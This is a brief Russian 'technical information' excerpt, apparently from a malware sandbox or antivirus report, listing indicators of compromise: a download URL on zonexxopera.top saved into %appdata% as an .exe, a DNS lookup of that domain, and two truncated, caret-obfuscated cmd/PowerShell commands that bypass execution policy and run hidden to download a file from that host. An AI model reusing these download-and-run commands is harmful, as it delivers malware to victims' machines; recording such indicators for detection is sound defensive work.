Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^We^r^s^HE^Ll.exe ^-e^xecUT^i^oNPoLi^cy^ b^ypASS -NO^P^rO^F^Il^E^ -^WI^nDOwSty^LE hi^DD^En (nEw-oBJECt Sy^S^t^Em^.N^e^t.Web^c^lI^ENt).^doW^nLO^aDF^ilE('http://zonexxopera.to...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "p^O^We^r^s^HE^Ll.exe ^-e^xecUT^i^oNPoLi^cy^ b^ypASS -NO^P^rO^F^Il^E^ -^WI^nDOwSty^LE hi^DD^En (nEw-oBJECt Sy^S^t^Em^.N^e^t.Web^c^lI^ENt).^doW^nLO^aDF^ilE('http://zonexxopera.to...' (со скрытым окном)